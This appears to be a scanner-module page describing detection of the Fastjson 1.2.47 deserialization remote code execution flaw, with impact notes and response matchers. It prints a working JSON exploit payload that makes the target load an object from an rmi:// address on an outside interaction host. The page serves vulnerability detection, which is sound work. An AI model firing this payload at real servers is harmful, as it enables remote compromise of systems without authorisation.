Ethical Hacking Automation

Automate Recon and scanning process with Vidoc. All security teams in one place

Fastjson 1.2.47 - Remote Code Execution

By kannthu

Critical
Vidoc logoVidoc Module
#rce#deserialization#oast#vulhub#fastjson
Description

Fastjson 1.2.47 - Remote Code Execution

What is "Fastjson 1.2.47 - Remote Code Execution?"

The "Fastjson 1.2.47 - Remote Code Execution" module is designed to detect a vulnerability in Fastjson 1.2.47, a Java library for JSON processing. This vulnerability allows for remote code execution through deserialization. The severity of this vulnerability is classified as critical, with a CVSS score of 10.

This module was authored by zh.

Impact

If successfully exploited, this vulnerability can allow an attacker to execute arbitrary code on the target system. This can lead to a complete compromise of the system, enabling unauthorized access, data theft, or further attacks.

How does the module work?

The module sends an HTTP POST request to the target system with a specific payload that triggers the deserialization vulnerability. The payload includes a malicious object that exploits the vulnerability in Fastjson 1.2.47.

Here is an example of the payload:

POST / HTTP/1.1
Host: <Hostname>
Content-Type: application/json

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://<InteractionURL>/Exploit",
        "autoCommit":true
    }
}

The module includes matching conditions to determine if the vulnerability is present. It checks for specific responses from the target system, such as a "Bad Request" or a status code of 400. Additionally, it verifies that the interaction protocol used is not DNS-based.

For more information, refer to the GitHub repository.

Module preview

Concurrent Requests (1)
1. HTTP Request template
Raw request
Matching conditions
word: dnsand
word: Bad Request, 400
Passive global matcher
No matching conditions.
On match action
Report vulnerability